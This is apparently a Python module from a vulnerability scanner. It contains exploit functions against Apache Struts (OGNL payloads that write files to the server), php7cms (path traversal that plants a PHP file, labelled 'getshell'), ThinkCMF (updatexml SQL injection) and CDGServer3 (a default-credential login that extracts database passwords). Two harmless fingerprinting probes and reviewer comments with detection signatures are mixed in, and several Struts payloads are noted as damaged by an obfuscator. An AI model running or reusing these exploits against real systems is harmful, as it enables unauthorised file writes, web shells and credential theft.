# rewritten by an e-mail-address obfuscator (`[email protected]`), so this
# copy is not intact.  The guard checks data['url'] but the request goes to
# data['base_url']; data['flag'] is set to 1 once curl returns, so success is
# never verified.  Side effect on target: the file at despath is created.
# Defender view: a form body whose `name=` starts with `%{(#` is the
# signature; the struts2-showcase application should not be deployed on
# exposed servers.
def upload(data=None): data = init(data, 'struts') if data['url'] != None: upload_poc = '''%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).(#[email protected]@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('start:')).(#fs=new java.io.FileOutputStream(%PATH%)).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/:end')).(#out.print(#req.getContextPath())).(#out.close())}''' despath = data['despath'] content = _read_file(data['srcpath']) try: _data = 'name=' + upload_poc.replace("%PATH%", despath).replace( "%FILECONTENT%", content) + '&age=a&__checkbox_bustedBefore=true&description=s' curl('post', data['base_url'] + '/struts2-showcase/integration/saveGangster.action', data=_data) data['flag'] = 1 data['data'].append({"poc": upload_poc}) data['res'].append({"info": despath, "key": 'upload'}) except: pass return data
# php7cms save_form_data probe: `name=/../../../adminsss.php"` makes the
# action write the POSTed `data` value (a `<?php phpinfo()?>` page) outside
# the intended directory; the probe then fetches adminsss.php and reports if
# its body contains "php.ini".  Tried for the "" and "php7cms/" prefixes.
# Side effect on target: adminsss.php is written and never removed.
# Defender view: POSTs to s=api&c=api&m=save_form_data with `../` in `name=`,
# or a new adminsss.php in the web root, indicate the probe.
def prove(data): data = init(data, 'php7cms') if data['base_url']: for path in ["", "php7cms/"]: postData = {'data': '<?php phpinfo()?>'} url1 = data[ 'base_url'] + path + 'index.php?s=api&c=api&m=save_form_data&name=/../../../adminsss.php"' res = curl('post', url1, data=postData) if res != None: url2 = data['base_url'] + path + 'adminsss.php' res = curl('get', url2) if res != None and "php.ini" in res.text: data['flag'] = 1 data['data'].append({"url": url2}) data['res'].append({ "info": url1, "key": "php7cms getshell" }) break return data
def prove(data):
    """Fingerprint a web page: keyword hits from a dictionary plus the page title.

    Fetches data['url']; for every keyword from data['dic_one'] (default
    dict/web_content_key.txt) that occurs in the body, sets data['flag'] = 1
    and adds it to a comma-separated key.  When at least one keyword hit,
    appends {"info": <title>, "key": <keywords>, "status": <HTTP status>} to
    data['res'].  Returns data.
    """
    data = init(data,'web')
    if data['url']:
        result = curl('get', data['url'])
        if result != None:
            status = result.status_code
            # Text: keyword matching against the raw body.
            webkeydic = _read_dic(data['dic_one']) if 'dic_one' in data.keys() else _read_dic('dict/web_content_key.txt')
            content = result.text
            key = ''
            for searchkey in webkeydic:
                # NOTE(review): str(searchkey, 'utf-8') only works if _read_dic yields
                # bytes here, while the activemq/rabbitmq probes strip its lines as
                # str — confirm which it is.
                searchkey = str(searchkey, 'utf-8').replace("\r", "").replace("\n", "")
                try:
                    if searchkey in content:
                        key += searchkey + ','
                        data['flag'] = 1
                except Exception as e:
                    print(e)
                    pass
            # title: the <title> text is re-encoded with the response encoding and
            # then decoded again with each candidate codec in turn.
            soup = BeautifulSoup(result.text, "html5lib")
            if soup != None:
                codes = ['utf-8', 'gbk']
                title = soup.title
                if title == None or title.string == '':
                    title = "[None Title]".encode('utf-8')
                else:
                    if result.encoding != None:
                        try:
                            title = title.string.encode(result.encoding)
                            codes.append(result.encoding)
                        except:
                            title = "[Error Code]".encode('utf-8')
                    else:
                        # NOTE(review): `title` stays a str here and the builtin `type`
                        # (not a codec name) is appended, so every decode below fails
                        # and the title ends as '[Error Code]'.
                        title = title.string
                        codes.append(type)
                for j in range(0, len(codes)):
                    try:
                        title = title.decode(codes[j]).strip().replace("\r", "").replace("\n", "")
                        break
                    except:
                        continue
                    finally:
                        # NOTE(review): finally runs after the `break` too, so a title
                        # that only decodes with the last candidate codec is replaced
                        # by '[Error Code]'.
                        if j + 1 == len(codes):
                            title = '[Error Code]'
            else:
                title = '[None Title]'
            if data['flag'] == 1:
                data['res'].append({"info": title, "key": key[:-1], "status": status})
    return data
# yst_dlp (CDGServer3) default-credential check: getEditionInfo.jsp is scraped
# for a name field, then SystemConfig is POSTed a Login for `configadmin`
# (the password literal in the request is `******`; the reported key reads
# configadmin/123456) and the est.connection.username /
# est.connection.password inputs are read from the reply.  If 1433/tcp is
# open on the target the result is prefixed with <target_host>:1433/.
# Read-only against the target, but the extracted database credentials are
# stored in data['res'] in clear text.
# Defender view: a POST to /CDGServer3/SystemConfig with command=Login for
# configadmin from a scanner is the signature; the default password must be
# changed and the config page must not be reachable from untrusted networks.
def prove(data): data = init(data,'yst_dlp') if data['base_url']: sql_result = None name = '' try: url = data['base_url'] + '/CDGServer3/help/getEditionInfo.jsp' r = curl('get',url) if r : res = r.text soup = BeautifulSoup(res,'html5lib') if '授权用户' in res: name = soup.select('body > div:nth-of-type(2) > table > tbody > tr:nth-of-type(6) > td:nth-of-type(2) > input[type="text"]') else: name = soup.select( 'body > div:nth-of-type(2) > table > tbody > tr:nth-of-type(5) > td:nth-of-type(2) > input[type="text"]') if len(name) > 0: name = name[0]['value'] except: name = '' try: url = data['base_url'] + '/CDGServer3/SystemConfig' _data = {'command':'Login','verifyCodeDigit':'dfd','name':'configadmin','pass':'******'} r = curl('post',url,data = _data) if r : res = r.content soup = BeautifulSoup(res, 'html5lib') sql_user = soup.select('#est\\.connection\\.username')[0]['value'] sql_pass = soup.select('#est\\.connection\\.password')[0]['value'] sql_result = name+ '/' + sql_user + '/' + sql_pass except: sql_result = None if sql_result: if _socket_connect(data['target_host'],1433): sql_result = data['target_host'] + ":1433/" + sql_result data['flag'] = 1 data['data'].append({"page": url}) data['res'].append({"info": sql_result, "key": "configadmin/123456"}) return data
# ThinkCMF error-based SQL injection probe: `post[id][1]` carries an
# `updatexml(1,concat(0x7e,(select user()),0x7e),1)` expression and a reply
# containing ":XPATH" (the MySQL XPath syntax error that echoes the value)
# is reported.  Read-only, though it does make the database evaluate user().
# `init(data,'thinkcmf')` is called for its side effect only (siblings rebind
# `data = init(...)`).
# Defender view: a POST to g=Portal&m=Article&a=edit_post whose body contains
# `updatexml(` is the signature.
def prove(data): init(data,'thinkcmf') if data['base_url']: url = data[ 'base_url'] + "index.php?g=Portal&m=Article&a=edit_post" _data = 'term=123&post[post_title]=123&post[post_title]=aaa&post_title=123&post[id][0]=bind&post[id][1]=0 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))' res = curl('post', url,data = _data) if res != None and ':XPATH' in res.text: data['flag'] = 1 data['data'].append({"flag": url}) data['res'].append({"info": url, "key": "thinkcmf 2.2.3 sql"}) return data
# Struts file drop via a multipart part: the OGNL expression in the "test"
# part URL-decodes `%FILECONTENT%` (the local data['srcpath']) and writes it
# to data['despath'] through a FileWriter.  As printed, the `#dm=...`,
# `#req=...` and `#res=...` fragments have been rewritten by an
# e-mail-address obfuscator (`[email protected]`), so this copy is not
# intact.  data['flag'] is set to 1 once curl returns; success is never
# verified.  Side effect on target: the file at despath is created and left
# in place.
# Defender view: multipart parts whose body starts with `%{(#` are the
# signature.
def upload(data=None): data = init(data, 'struts') if data['url'] != None: upload_poc = '''%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).(#[email protected]@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#filecontent='%FILECONTENT%').(new java.io.BufferedWriter(new java.io.FileWriter('%PATH%')).append(new java.net.URLDecoder().decode(#filecontent,'UTF-8')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}\0b''' despath = data['despath'] content = _read_file(data['srcpath']) headers = {} try: files = { "test": (upload_poc.replace("%PATH%", despath).replace("%FILECONTENT%", content), "text/plain") } curl('post', data['url'], headers=headers, files=files) data['flag'] = 1 data['data'].append({"poc": upload_poc}) data['res'].append({"info": despath, "key": 'upload'}) except: pass return data
# Struts file drop via the `method:` action prefix: the OGNL in `method:`
# opens a FileWriter on `shellname=` (data['despath']) and appends
# `shellContent=` (the local data['srcpath']).  As printed, the
# `%23dm%3d...DEFAULT_MEMBER_ACCESS` fragment has been rewritten by an
# e-mail-address obfuscator (`[email protected]`), so this copy is not intact.
# data['flag'] is set to 1 once curl returns; success is never verified.
# Side effect on target: the file at shellname is created and left in place.
# Defender view: query strings beginning with `method:%23` are the signature;
# the `method:` prefix should be disabled on exposed actions.
def upload(data=None): data = init(data, 'struts') if data['url'] != None: upload_poc = '''method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close(),1?%23xx:%23request.toString&shellname=%PATH%&shellContent=%FILECONTENT%&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f''' despath = data['despath'] content = _read_file(data['srcpath']) headers = {} try: headers["Content-Type"] = "application/x-www-form-urlencoded" curl('get', data['url'], params=upload_poc.replace("%PATH%", despath).replace( "%FILECONTENT%", content), headers=headers) data['flag'] = 1 data['data'].append({"poc": upload_poc}) data['res'].append({"info": despath, "key": "upload"}) except: pass return data
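def prove(data):
    """Record the Allow header returned by an OPTIONS request to the target.

    Sends OPTIONS to <base_url>/testbyme; when the reply carries an Allow
    header, sets data['flag'] = 1, appends {"method": "options"} to
    data['data'] and {"info": <Allow value>, "key": "OPTIONS"} to data['res'].
    A missing response or header leaves data untouched.  Returns data.
    """
    data = init(data, 'web')
    if data['base_url'] is not None:
        try:
            res = curl('options', data['base_url'] + "/testbyme")
            allow = res.headers['Allow']
        except Exception:
            # Narrowed from a bare except so Ctrl-C still stops the scan;
            # no response (curl returned None) or no Allow header means
            # there is nothing to report.
            return data
        data['flag'] = 1
        data['data'].append({"method": "options"})
        data['res'].append({"info": allow, "key": "OPTIONS"})
    return data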